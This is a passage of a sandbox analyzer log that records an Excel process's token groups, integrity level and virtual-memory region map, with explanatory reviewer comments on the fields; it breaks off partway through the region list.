# Flog Txt Version 1
# Analyzer Version: 2024.2.1
# Analyzer Build Date: Mar 23 2024 12:02:19
# Log Creation Date: 03.06.2024 09:26:25.634
# Process record for the monitored sample host: Excel, launched with no
# document argument on the command line (see cmd_line below).
# The Region records that follow this one appear to be this process's
# virtual-memory map at the time of logging (review note: confirm against
# the analyzer's format documentation).
Process:
id = "1"
image_name = "excel.exe"
filename = "c:\\program files\\microsoft office\\office16\\excel.exe"
page_root = "0x48f10000"
os_pid = "0xe44"
# 0x2000 equals the Windows medium mandatory-integrity RID, i.e. a
# non-elevated user process (assuming this field holds the integrity RID).
os_integrity_level = "0x2000"
# Privilege bitmask; the bit-to-privilege mapping is not given in this log.
os_privileges = "0x800000"
# "analysis_target" marks this process as the one submitted for analysis,
# as opposed to one picked up because of something another process did.
monitor_reason = "analysis_target"
# parent_id is the analyzer's own process id; 0 presumably means the parent
# is not a monitored process. os_parent_pid is the OS-level parent PID.
parent_id = "0"
os_parent_pid = "0x778"
cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
# Token group list. The bracketed values look like Windows SE_GROUP_*
# attribute masks: 0x7 = mandatory | enabled-by-default | enabled,
# 0x10 = use-for-deny-only, 0xc0000007 = logon-ID group plus 0x7.
# Both Administrators entries carry 0x10, which is consistent with a
# UAC-filtered token and with the medium integrity level above.
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 252
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 253
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 254
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 255
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 256
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 257
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 258
start_va = 0x70000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 259
start_va = 0x170000
end_va = 0x1d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 260
start_va = 0x1e0000
end_va = 0x2dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 261
start_va = 0x2e0000
end_va = 0x2e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 262
start_va = 0x2f0000
end_va = 0x2f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 263
start_va = 0x300000
end_va = 0x301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 264
start_va = 0x310000
end_va = 0x31ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 265
start_va = 0x320000
end_va = 0x321fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000320000"
filename = ""
Region:
id = 266
start_va = 0x330000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 267
start_va = 0x340000
end_va = 0x341fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 268
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 269
start_va = 0x450000
end_va = 0x5d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 270
start_va = 0x5e0000
end_va = 0x760fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 271
start_va = 0x770000
end_va = 0x1b6ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000770000"
filename = ""
Region:
id = 272
start_va = 0x1b70000
end_va = 0x1b71fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b70000"
filename = ""
Region:
id = 273
start_va = 0x1b80000
end_va = 0x1b81fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b80000"
filename = ""
Region:
id = 274
start_va = 0x1b90000
end_va = 0x1b91fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b90000"
filename = ""
Region:
id = 275
start_va = 0x1ba0000
end_va = 0x1ba1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ba0000"
filename = ""
Region:
id = 276
start_va = 0x1bb0000
end_va = 0x1bb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 277
start_va = 0x1bc0000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bc0000"
filename = ""
Region:
id = 278
start_va = 0x1c00000
end_va = 0x1c00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 279
start_va = 0x1c10000
end_va = 0x1c14fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c10000"
filename = ""
Region:
id = 280
start_va = 0x1c20000
end_va = 0x1c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c20000"
filename = ""
Region:
id = 281
start_va = 0x1c30000
end_va = 0x1c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c30000"
filename = ""
Region:
id = 282
start_va = 0x1c40000
end_va = 0x1c40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c40000"
filename = ""
Region:
id = 283
start_va = 0x1c50000
end_va = 0x1c5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 284
start_va = 0x1c60000
end_va = 0x1c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c60000"
filename = ""
Region:
id = 285
start_va = 0x1c70000
end_va = 0x1c70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c70000"
filename = ""
Region:
id = 286
start_va = 0x1c80000
end_va = 0x1c80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 287
start_va = 0x1c90000
end_va = 0x1c94fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 288
start_va = 0x1ca0000
end_va = 0x1ca0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ca0000"
filename = ""
Region:
id = 289
start_va = 0x1cb0000
end_va = 0x1cb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cb0000"
filename = ""
Region:
id = 290
start_va = 0x1cc0000
end_va = 0x1cc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cc0000"
filename = ""
Region:
id = 291
start_va = 0x1cd0000
end_va = 0x1cd1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cd0000"
filename = ""
Region:
id = 292
start_va = 0x1ce0000
end_va = 0x1cecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 293
start_va = 0x1cf0000
end_va = 0x1cf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cf0000"
filename = ""
Region:
id = 294
start_va = 0x1d00000
end_va = 0x1d01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 295
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 296
start_va = 0x1d90000
end_va = 0x1e6efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d90000"
filename = ""
Region:
id = 297
start_va = 0x1e70000
end_va = 0x1ec0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuil.ttf"
filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf")
Region:
id = 298
start_va = 0x1ed0000
end_va = 0x1ed1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ed0000"
filename = ""
Region:
id = 299
start_va = 0x1ee0000
end_va = 0x1eecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comdlg32.dll.mui"
filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui")
Region:
id = 300
start_va = 0x1ef0000
end_va = 0x1f17fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 301
start_va = 0x1f20000
end_va = 0x1f20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f20000"
filename = ""
Region:
id = 302
start_va = 0x1f30000
end_va = 0x202ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 303
start_va = 0x2030000
end_va = 0x2031fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002030000"
filename = ""
Region:
id = 304
start_va = 0x2040000
end_va = 0x2050fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 305
start_va = 0x2060000
end_va = 0x2060fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002060000"
filename = ""
Region:
id = 306
start_va = 0x2070000
end_va = 0x216ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002070000"
filename = ""
Region:
id = 307
start_va = 0x2170000
end_va = 0x21eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 308
start_va = 0x21f0000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 309
start_va = 0x22f0000
end_va = 0x25befff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 310
start_va = 0x25c0000
end_va = 0x3601fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "xlintl32.dll"
filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\xlintl32.dll")
Region:
id = 311
start_va = 0x3610000
end_va = 0x370ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003610000"
filename = ""
Region:
id = 312
start_va = 0x3710000
end_va = 0x380ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003710000"
filename = ""
Region:
id = 313
start_va = 0x3810000
end_va = 0x3810fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003810000"
filename = ""
Region:
id = 314
start_va = 0x3820000
end_va = 0x3821fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003820000"
filename = ""
Region:
id = 315
start_va = 0x3830000
end_va = 0x3831fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003830000"
filename = ""
Region:
id = 316
start_va = 0x3840000
end_va = 0x3841fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003840000"
filename = ""
Region:
id = 317
start_va = 0x3850000
end_va = 0x38abfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shell32.dll.mui"
filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui")
Region:
id = 318
start_va = 0x38b0000
end_va = 0x38b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000038b0000"
filename = ""
Region:
id = 319
start_va = 0x38c0000
end_va = 0x38c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "explorerframe.dll.mui"
filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui")
Region:
id = 320
start_va = 0x38d0000
end_va = 0x38dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038d0000"
filename = ""
Region:
id = 321
start_va = 0x38e0000
end_va = 0x39dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038e0000"
filename = ""
Region:
id = 322
start_va = 0x39e0000
end_va = 0x3adffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000039e0000"
filename = ""
Region:
id = 323
start_va = 0x3ae0000
end_va = 0x3af1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003ae0000"
filename = ""
Region:
id = 324
start_va = 0x3b00000
end_va = 0x3b11fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b00000"
filename = ""
Region:
id = 325
start_va = 0x3b20000
end_va = 0x3b23fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 326
start_va = 0x3b30000
end_va = 0x3b32fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b30000"
filename = ""
Region:
id = 327
start_va = 0x3b40000
end_va = 0x3b42fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b40000"
filename = ""
Region:
id = 328
start_va = 0x3b50000
end_va = 0x3b52fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b50000"
filename = ""
Region:
id = 329
start_va = 0x3b60000
end_va = 0x3b60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b60000"
filename = ""
Region:
id = 330
start_va = 0x3b70000
end_va = 0x3b70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b70000"
filename = ""
Region:
id = 331
start_va = 0x3b80000
end_va = 0x3b80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b80000"
filename = ""
Region:
id = 332
start_va = 0x3b90000
end_va = 0x3b92fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b90000"
filename = ""
Region:
id = 333
start_va = 0x3ba0000
end_va = 0x3c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003ba0000"
filename = ""
Region:
id = 334
start_va = 0x3ca0000
end_va = 0x409ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003ca0000"
filename = ""
Region:
id = 335
start_va = 0x40a0000
end_va = 0x419ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000040a0000"
filename = ""
Region:
id = 336
start_va = 0x41a0000
end_va = 0x41a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041a0000"
filename = ""
Region:
id = 337
start_va = 0x41b0000
end_va = 0x41bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041b0000"
filename = ""
Region:
id = 338
start_va = 0x41c0000
end_va = 0x41c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041c0000"
filename = ""
Region:
id = 339
start_va = 0x41d0000
end_va = 0x41d1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041d0000"
filename = ""
Region:
id = 340
start_va = 0x41e0000
end_va = 0x41e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041e0000"
filename = ""
Region:
id = 341
start_va = 0x41f0000
end_va = 0x426ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041f0000"
filename = ""
Region:
id = 342
start_va = 0x4270000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004270000"
filename = ""
Region:
id = 343
start_va = 0x4a70000
end_va = 0x4ad3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisb.ttf"
filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")
Region:
id = 344
start_va = 0x4ae0000
end_va = 0x4ae0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ae0000"
filename = ""
Region:
id = 345
start_va = 0x4af0000
end_va = 0x4af0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004af0000"
filename = ""
Region:
id = 346
start_va = 0x4b00000
end_va = 0x4b00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 347
start_va = 0x4b10000
end_va = 0x4b10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 348
start_va = 0x4b20000
end_va = 0x4b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b20000"
filename = ""
Region:
id = 349
start_va = 0x4ba0000
end_va = 0x4ba0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ba0000"
filename = ""
Region:
id = 350
start_va = 0x4bb0000
end_va = 0x4bb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 351
start_va = 0x4bc0000
end_va = 0x4bc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 352
start_va = 0x4bd0000
end_va = 0x4bd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bd0000"
filename = ""
Region:
id = 353
start_va = 0x4be0000
end_va = 0x4c27fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004be0000"
filename = ""
Region:
id = 354
start_va = 0x4c30000
end_va = 0x4c30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 355
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 356
start_va = 0x4c50000
end_va = 0x4c97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c50000"
filename = ""
Region:
id = 357
start_va = 0x4ca0000
end_va = 0x4ca0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 358
start_va = 0x4cb0000
end_va = 0x4cb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 359
start_va = 0x4cc0000
end_va = 0x4cc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 360
start_va = 0x4cd0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 361
start_va = 0x4dd0000
end_va = 0x4e7afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 362
start_va = 0x4e80000
end_va = 0x4e80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e80000"
filename = ""
Region:
id = 363
start_va = 0x4e90000
end_va = 0x4e90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 364
start_va = 0x4ea0000
end_va = 0x4ea0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ea0000"
filename = ""
Region:
id = 365
start_va = 0x4eb0000
end_va = 0x4faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004eb0000"
filename = ""
Region:
id = 366
start_va = 0x4fb0000
end_va = 0x51affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fb0000"
filename = ""
Region:
id = 367
start_va = 0x51b0000
end_va = 0x52affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051b0000"
filename = ""
Region:
id = 368
start_va = 0x52b0000
end_va = 0x52dffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 369
start_va = 0x52e0000
end_va = 0x52e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 370
start_va = 0x52f0000
end_va = 0x52fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 371
start_va = 0x5300000
end_va = 0x5301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005300000"
filename = ""
Region:
id = 372
start_va = 0x5310000
end_va = 0x5310fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 373
start_va = 0x5320000
end_va = 0x5320fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005320000"
filename = ""
Region:
id = 374
start_va = 0x5330000
end_va = 0x5331fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005330000"
filename = ""
Region:
id = 375
start_va = 0x5340000
end_va = 0x5340fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005340000"
filename = ""
Region:
id = 376
start_va = 0x5350000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005350000"
filename = ""
Region:
id = 377
start_va = 0x5450000
end_va = 0x5d7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 378
start_va = 0x5d80000
end_va = 0x5de5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 379
start_va = 0x5df0000
end_va = 0x5df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005df0000"
filename = ""
Region:
id = 380
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 381
start_va = 0x5f00000
end_va = 0x5f03fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 382
start_va = 0x5f10000
end_va = 0x5f10fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db")
Region:
id = 383
start_va = 0x5f20000
end_va = 0x5f23fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 384
start_va = 0x5f30000
end_va = 0x5f30fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{82cb5ea4-a17b-4126-a4c7-e62dcc8f64aa}.2.ver0x0000000000000003.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{82CB5EA4-A17B-4126-A4C7-E62DCC8F64AA}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{82cb5ea4-a17b-4126-a4c7-e62dcc8f64aa}.2.ver0x0000000000000003.db")
Region:
id = 385
start_va = 0x5f40000
end_va = 0x5f40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f40000"
filename = ""
Region:
id = 386
start_va = 0x5f50000
end_va = 0x5f50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f50000"
filename = ""
Region:
id = 387
start_va = 0x5f60000
end_va = 0x605ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f60000"
filename = ""
Region:
id = 388
start_va = 0x6060000
end_va = 0x6060fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 389
start_va = 0x6070000
end_va = 0x6077fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 390
start_va = 0x6080000
end_va = 0x6080fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 391
start_va = 0x6090000
end_va = 0x6091fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006090000"
filename = ""
Region:
id = 392
start_va = 0x60a0000
end_va = 0x649ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000060a0000"
filename = ""
Region:
id = 393
start_va = 0x64a0000
end_va = 0x6c9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000064a0000"
filename = ""
Region:
id = 394
start_va = 0x6ca0000
end_va = 0x6d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ca0000"
filename = ""
Region:
id = 395
start_va = 0x6da0000
end_va = 0x6e9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006da0000"
filename = ""
Region:
id = 396
start_va = 0x6ea0000
end_va = 0x6ea0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ea0000"
filename = ""
Region:
id = 397
start_va = 0x6ed0000
end_va = 0x6edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ed0000"
filename = ""
Region:
id = 398
start_va = 0x6ee0000
end_va = 0x76dffff
monitored = 1
